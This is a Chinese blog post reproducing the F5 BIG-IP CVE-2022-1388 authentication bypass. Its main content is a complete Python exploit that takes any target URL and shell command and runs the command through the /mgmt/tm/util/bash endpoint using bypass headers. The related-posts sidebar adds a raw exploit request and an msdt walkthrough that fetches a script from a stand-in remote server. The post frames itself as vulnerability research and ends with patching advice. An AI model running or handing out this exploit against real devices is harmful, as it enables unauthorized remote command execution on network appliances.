CVE-2022-1388 F5 BIG-IP权限绕过命令执行漏洞复现

已于 2022-09-25 14:38:49 修改
阅读量2.1k 收藏 2
点赞数 2
分类专栏: 漏洞复现【Free】 文章标签: 安全 java 数据库
于 2022-09-02 18:42:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44281295/article/details/126668164
版权

目录

0x01 声明:

0x02 简介:

0x03 漏洞概述:

0x04 影响版本:

0x05 环境搭建:

下载环境:(要注册账号)

登录页面:

0x06 漏洞复现:

EXP地址:

修改EXP:

利用EXP:

0x07 流量分析:

说明:

特征一:(看到这个特征我就想起来CVE-2021-22986这个漏洞。)

特征二:

特征三: 

0x08 修复建议:

0x01 声明:

        仅供学习参考使用,请勿用作违法用途,否则后果自负。

0x02 简介:

        F5Networks(纳斯达克: FFIV),全球领先的应用交付网络(ADN)领域的厂商,创建于1996年,总部位于美国西雅图市,F5为全球大型企业、运营商、政府与消费品牌提供更加快速、安全以及智能的应用,通过交付云与安全解决方案,F5帮助企业在不损失速度与管理性的同时享有它们所需的应用架构 。        

0x03 漏洞概述:

        F5官网发布安全公告,披露F5 BIG-IP存在一处远程代码执行漏洞(CVE-2022-1388)。漏洞存在于iControl REST组件中,该漏洞允许定义身份验证的攻击者通过 BIG-IP 管理界面和自身IP地址对 iControl REST API 接口进行网络访问,进而导致可以在目标主机上执行任意系统命令、创建或删除文件或禁用BIG-IP上的服务。

0x04 影响版本:

        BIG-IP 16.x: 16.1.0 - 16.1.2
        BIG-IP 15.x: 15.1.0 - 15.1.5
        BIG-IP 14.x: 14.1.0 - 14.1.4
        BIG-IP 13.x: 13.1.0 - 13.1.4
        BIG-IP 12.x: 12.1.0 - 12.1.6
        BIG-IP 11.x: 11.6.1 - 11.6.5

0x05 环境搭建:

        下载环境:(要注册账号)

         F5 - Login 选择存在漏洞版本。 

 选择OVA格式下载后直接导入VMware Workstation

        登录页面:

0x06 漏洞复现:

        EXP地址:

GitHub - bytecaps/CVE-2022-1388-EXP: CVE-2022-1388 F5 BIG-IP RCE 批量检测

        修改EXP:

import requests
import json
import ssl
import urllib3

urllib3.disable_warnings()
ssl._create_default_https_context = ssl._create_unverified_context
requests.packages.urllib3.disable_warnings()


def attack(target_url, cmd):
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
        'Content-Type': 'application/json',
        'Connection': 'Keep-Alive, X-F5-Auth-Token, X-Forwarded-Host',
        'X-F5-Auth-Token': 'a',
        'Authorization': 'Basic YWRtaW46'
    }

    attack_url = target_url + '/mgmt/tm/util/bash'

    data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(cmd)}

    try:
        response = requests.post(url=attack_url, json=data, headers=headers, verify=False, timeout=5)
        if response.status_code == 200 and 'commandResult' in response.text:
            default = json.loads(response.text)
            display = default['commandResult']
            print("[+] 目标 {} 存在漏洞".format(target_url))
            print('[+] 响应为:{0}'.format(display))
        else:
            print("[-] 目标 {} 不存在漏洞".format(target_url))
    except Exception as e:
        print('url 访问异常 {0}'.format(target_url))


if __name__ == '__main__':
    target_url = input("请输入URL:")
    cmd = input("请输入执行的命令:")
    attack(target_url, cmd)
    print(target_url, cmd)

         利用EXP:

0x07 流量分析:

        说明:

        由于抓到的流量都是TLS加密的流量,研究了很多天都没办法解密,所以只能分析EXP了,从EXP中不难发现有三个特征。

        特征一:(看到这个特征我就想起来CVE-2021-22986这个漏洞。)

        特征二:

        特征三: 

0x08 修复建议:

        当前官方已发布最新版本,建议受影响的用户及时更新升级到最新版本。

        链接:https://downloads.f5.com

Evan Kang
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
漏洞CVE-2022-1388
x10n9的博客
03-10 513
CVE-2022-1388是一个影响F5 BIG-IP设备的严重漏洞12,它可以让未经身份验证的攻击者绕过iControl REST认证,通过管理端口执行恶意命令
CVE-2022-1388 F5 BIG-IP iControl REST 处理进程分析与认证绕过漏洞复现
weixin_50464560的博客
05-10 2036
转载至CVE-2022-1388 F5 BIG-IP iControl REST 处理进程分析与认证绕过漏洞复现-网盾安全学院 (315safe.com) 漏洞信息 F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。2022年5月4日,F5官方发布安全通告,修复了一个存在于BIG-IP iControl REST中的身份验证绕过漏洞漏洞编号:CVE-2022-1388,影响版本如下: 环境搭建 下载v15.x系列: 首次运行需要修改
CVE-2022-1388——F5 BIG-IP iControl REST 身份认证绕过漏洞_f5 big-ip icontrol rest身份验证绕过漏洞
最新发布
2401_84519907的博客
05-16 484
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
F5 CVE-2022-1388 CVE-2021-22986测试
weixin_44184011的博客
08-14 525
又到了护网的时候,客户开始关注安全问题,来跟我咨询两个F5CVECVE-2022-1388 CVE-2021-22986。在给客户提供了解决方案之后,由于这两个CVE时间都比较长(一个是2021年一个是2022年的),所以做了个简单的POC。两个CVE都是基于F5的RESTAPI进行利用,可绕过身份验证,远程执行命令。可通过升级的方式修复,如果暂时不方便升级,可以根据官方指示进行缓解。
CVE-2022-1388-EXP(F5-BIGIP)
PolarPeak的博客
05-14 1001
简介 F5 BIG-IP 是美国``F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。 EXP POST /mgmt/tm/util/bash HTTP/1.1 Host: X-F5-Auth-Token: a Authorization: Basic YWRtaW46 Connection: keep-alive, x-F5-Auth-Token Content-Length: 0 Cache-Control: max-age=0 {
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行.md
04-23
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行
Apache Spark 命令注入(CVE-2022-33891)格式化文档
08-10
然而,它存在一个名为 CVE-2022-33891 的严重安全漏洞,这是一个命令注入问题,允许攻击者通过精心构造的请求在运行受影响版本的 Spark 实例上执行任意系统命令。 此漏洞源于 Spark Web UI 的一个缺陷,特别是与其 ...
IIS "IP and domain restrictions" 绕过漏洞(CVE-2014-4078)
02-09
【该漏洞通过版本比较方式检测,结果可能不准确,需要根据实际情况确认。】Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 "IP and domain restrictions" ...
CVE-2022-1388——F5 BIG-IP iControl REST 身份认证绕过漏洞
LiBai'S BLOG
05-06 7325
漏洞描述 BIG-IPF5 公司的一款应用交付服务是面向以应用为中心的世界先进技术。借助 BIG-IP 应用程序交付控制器保持应用程序正常运行。BIG-IP 本地流量管理器 (LTM) 和 BIG-IP DNS 能够处理应用程序流量并保护基础设施。 CVE-2022-1388 未经身份验证的攻击者可以通过管理端口或自身 IP 地址对 BIG-IP 系统进行网络访问,执行任意系统命令、创建或删除文件或禁用服务。 漏洞危害 该漏洞CVSS评分:9.8 危害等级:严重 影响范围 11.6.1 - 11..
F5 BIG-IP iControl REST命令执行(CVE-2022-1388)
不忘初心,护天下安全!
06-27 900
2022年5月6日,F5官网发布安全公告,披露F5 BIG-IP存在一处远程代码执行漏洞CVE-2022-1388)。漏洞存在于iControl REST组件中,该漏洞允许定义身份验证的攻击者通过 BIG-IP 管理界面和自身IP地址对 iControl REST API 接口进行网络访问,进而导致可以在目标主机上执行任意系统命令、创建或删除文件或禁用BIG-IP上的服务。组件:F5 BIG-IP iControl REST漏洞类型:身份验证绕过影响:命令执行简述:该漏洞允许未经身份验证的攻击者通过管理口
F5 BIG-IP 高危漏洞可导致拒绝服务和代码执行
smellycat000的专栏
02-03 1459
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士F5 提醒称,BIG-IP 中存在一个高危格式化字符串漏洞 (CVE-2023-22374),可导致认证攻击者触发拒绝服务条件并可能执行任意代码。该漏洞影响一个公开的API即 iControl SOAP,该API用于赋能系统间的通信。SOAP接口可通过BIG-IP管理端口和/或自己的IP地址从网络访问,且仅限于管理员账户。发现该漏洞的Rapid ...
F5 BIG-IP 身份验证绕过漏洞CVE-2023-46747)
weixin_53523921的博客
10-30 1638
当发送到F5 BIG-IP TMUI模块的请求(例如登陆页面/tmui/login.jsp)中,包含一个类似值为 "xxx, chunked" 的 "Transfer-Encoding" 头,并且请求体内容满足特定内容时,漏洞会被触发。由于它正在处理的标头的 “chunked, chunked” 值不匹配,因此它继续处理 else 分支的其余部分,并将 POST 正文内容作为 AJP 数据包直接发送到后端服务器。发送“前端”认为已经处理过认证的请求到“后端”服务,会导致出现一些出乎意料的后果。
F5 BIG-IP 存在远程命令执行漏洞(CVE-2022-1388)
nnn2188185的博客
05-06 600
F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 F5 BIG-IP 存在访问控制错误漏洞,攻击者可以通过未公开的请求利用该漏洞绕过 BIG-IP 中的 iControl REST 身份验证来控制受影响的系统。 可造成远程命令执行漏洞
[CVE-2022-1388]F5-BIGIP iControl REST绕过授权访问漏洞
whoami
05-09 3099
一、背景 F5 BIG-IP产品系列包括运行F5 TMOS操作系统的硬件、模块化软件和虚拟设备。根据所选设备,可以添加一个或多个 BIG-IP 产品模块。 产品包括: BIG-IP 本地流量管理器 (LTM) :基于全代理架构,具有缓存、压缩和 tcp 加速的本地负载平衡。 BIG-IP DNS:智能全球站点负载平衡 (GSLB) 和权威 DNS 服务器。根据用户、网络和云性能条件分发 DNS 和应用程序请求。 BIG-IP 高级防火墙管理器 (AFM):本地 DDoS 保护和数据中心防火墙。 BIG
F5 BIG-IP远程代码执行漏洞复现CVE-2020-5902)
锋刃科技的博客
07-06 2030
前言 F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。 影响版本 BIG-IP 15.x: 15.1.0/15.0.0 BIG-IP 14.x: 14.1.0 ~ 14.1.2 BIG-IP 13.x: 13.1.0 ~ 13.1.3 BIG-IP 12.x: 12.1.0 ~ 12.1.5 BIG-IP 11.x: 11.6.1 ~ 11.6.5 环境搭建 在下面页面登录注册,之后申请秘钥 http
F5 BIGIP CVE-2021-22986认证绕过漏洞分析
include_voidmain的博客
06-15 2247
F5 BIGIP CVE-2021-22986认证绕过漏洞分析
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Evan Kang

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值